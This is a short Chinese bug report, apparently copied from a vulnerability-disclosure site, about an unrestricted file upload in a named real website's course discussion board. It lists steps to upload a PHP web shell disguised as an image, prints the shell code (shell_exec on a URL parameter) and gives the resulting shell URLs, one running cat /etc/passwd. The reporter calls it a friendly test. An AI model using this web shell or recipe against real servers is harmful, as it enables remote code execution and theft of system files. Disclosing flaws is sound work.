漏洞细节
输入网址:http://www.ydma.cn/
1、随意注册一个账号
2、购买任意免费课程
3、进入该课程的讨论区
4、点击发表话题,点击上传图片。

<?php
$x = shell_exec($_GET['XX']);
var_dump($x);
?>
复制返回地址到浏览器打开。
例如:http://www.ydma.cn/files/image/2015/11-18/765506617564c41053996b.php
or :http://www.ydma.cn/files/image/2015/11-18/1889937821564c46536c47e.php?XX=cat%20/etc/passwd
======================
我只是友情测试漏洞,并未深入

参见:https://bugs.shuimugan.com/bug/view?bug_no=154170

本文详细介绍了在YDMA网站上发现的一个安全漏洞,通过特定步骤,用户可以上传包含恶意代码的图片,潜在地允许远程代码执行。此漏洞利用了网站的图片上传功能,通过上传包含PHP代码的图片文件,攻击者可能获取服务器权限。
299

被折叠的 条评论
为什么被折叠?



